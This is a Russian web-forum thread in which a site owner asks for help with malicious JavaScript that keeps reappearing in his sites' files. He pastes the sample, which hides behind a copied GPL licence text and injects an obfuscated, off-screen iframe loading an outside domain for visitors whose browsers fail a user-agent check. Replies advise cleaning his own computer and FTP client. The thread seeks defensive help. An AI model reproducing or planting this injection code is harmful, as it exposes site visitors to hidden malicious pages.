Вирусы на сайте

[CaptainPower]

Столкнулся с появлением на сайте чужого кода в файлах js.

пароли к хостингу и фтп меняю постоянно

восстанавливаю из бекапов, чищу руками

проверяю .htacess и наличие чужих файлов в системе - ничего подозрительно не нахожу

 

код через некоторое время появляется снова бывает на сл день бывает через несколько недель.

 

логи доступа к хостингу показываю что заражение идет с моей машины. (постояно чищу куреитом и каспером)

Самое обидное что заражение идет на все сайты в папке www

 

бывает код модифицируется

 

ниже приведена последняя версия 

до этого код  начинался и заканчивался с такими коментами:

//beleiad9  //kolamne817

//hshsggh

//sifucnci //сropalis

 

Кто может что подсказать буду благодарен. 

//sifucnci
/*


GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION


0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".


Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.


1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.


You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.


2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:


a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.


b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.


c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)


These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.


Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.


In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.


NO WARRANTY


11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.


12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.


END OF TERMS AND CONDITIONS */ (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function nerdglobus(){ var maloArticulo = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/32','Chrome','IEMobile','SymbianOS','Avant','Chromium','Firefox/18.0','Firefox/18.0.1','Firefox/17.0','Firefox/12.0','Firefox/25.0','Firefox/24.0','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/20.0','Firefox/21.0','Firefox/22.0','Firefox/23.0','Firefox/25.0.1','Firefox/26.0','Maxthon','Chrome/31','Chrome/7','Chrome/30','Chrome/29','Chrome/28','Chrome/27','ChromePlus','MSIE 6.1','MSIE 6.01','MSIE 6.0b','MSIE 6.0','rv:11.0']; var hermanKA = false; for (var i in maloArticulo) { if (stripos(navigator.userAgent, maloArticulo[i])) { hermanKA = true; break; } } return hermanKA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!nerdglobus()) { var cookie = getCookie('media87tron19long107he'); if (cookie == undefined) { setCookie('media87tron19long107he', true, 260000); document.write('<'+'i'+'f'+'r'+'a'+'m'+'e'+' s'+'r'+'c'+'='+'http://motor.taiwanmoto.com/songs.html?like'+' style="position:absolute;left:-1400px;top:-1400px;" height="115" width="115">'+'<'+'/'+'i'+'f'+'r'+'a'+'m'+'e'+'>'); } }; })(); //cropalis

[mpn2005]

Похожая тема уже поднималась.

Спросите там - https://opencartforum.com/topic/26850-%D1%80%D0%B5%D1%88%D0%B5%D0%BD%D0%BE-joomla-%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC-%D0%BC%D0%B0%D0%B3%D0%B0%D0%B7%D0%B8%D0%BD%D0%B0-js/

 

Там правда не особо много обсуждения.

[chukcha]

логи доступа к хостингу показываю что заражение идет с моей машины

 

Так начните со своей машины

Смените пароли на фтп

Не храните их в известных ftp клиентах